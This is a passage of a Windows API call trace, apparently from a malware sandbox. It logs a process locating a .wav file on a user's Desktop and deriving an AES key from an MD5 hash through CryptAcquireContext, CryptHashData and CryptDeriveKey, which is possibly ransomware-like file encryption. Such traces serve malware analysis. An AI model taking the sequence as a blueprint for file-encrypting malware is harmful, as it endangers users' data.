Size=0xc) returned 0x88cee0 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.528] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.529] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.529] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.529] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.529] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.529] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.529] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8e0440, ftCreationTime.dwHighDateTime=0x1d5befa, ftLastAccessTime.dwLowDateTime=0x5a88f350, ftLastAccessTime.dwHighDateTime=0x1d5b9ed, ftLastWriteTime.dwLowDateTime=0x5a88f350, ftLastWriteTime.dwHighDateTime=0x1d5b9ed, nFileSizeHigh=0x0, nFileSizeLow=0x14d27, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="32U39klehZ.wav", cAlternateFileName="32U39K~1.WAV")) returned 0x7c2100 [0029.529] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.529] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.529] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0029.529] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.529] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.530] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0029.530] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.530] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.530] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.530] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.530] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.530] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.530] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0029.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0029.530] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.531] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.531] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0029.531] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0029.531] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.531] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0029.532] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.532] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.532] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0029.532] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.532] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0029.532] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0029.532] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0029.532] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.532] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0029.532] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.532] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0029.532] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.532] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.533] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.533] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.533] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0029.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.533] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.533] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.533] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0029.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0029.533] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.533] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0029.533] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.533] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0029.533] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.533] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0029.533] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.533] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.533] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.533] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.533] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.533] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0029.534] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.534] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0029.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0029.534] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.534] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.534] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0029.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0029.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.534] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0029.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.534] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.534] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.534] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.534] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0029.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0029.534] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.535] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.535] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.535] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0029.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.535] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.535] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0029.535] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.535] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0029.535] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.535] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.535] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.535] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.535] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0029.535] CharLowerBuffW 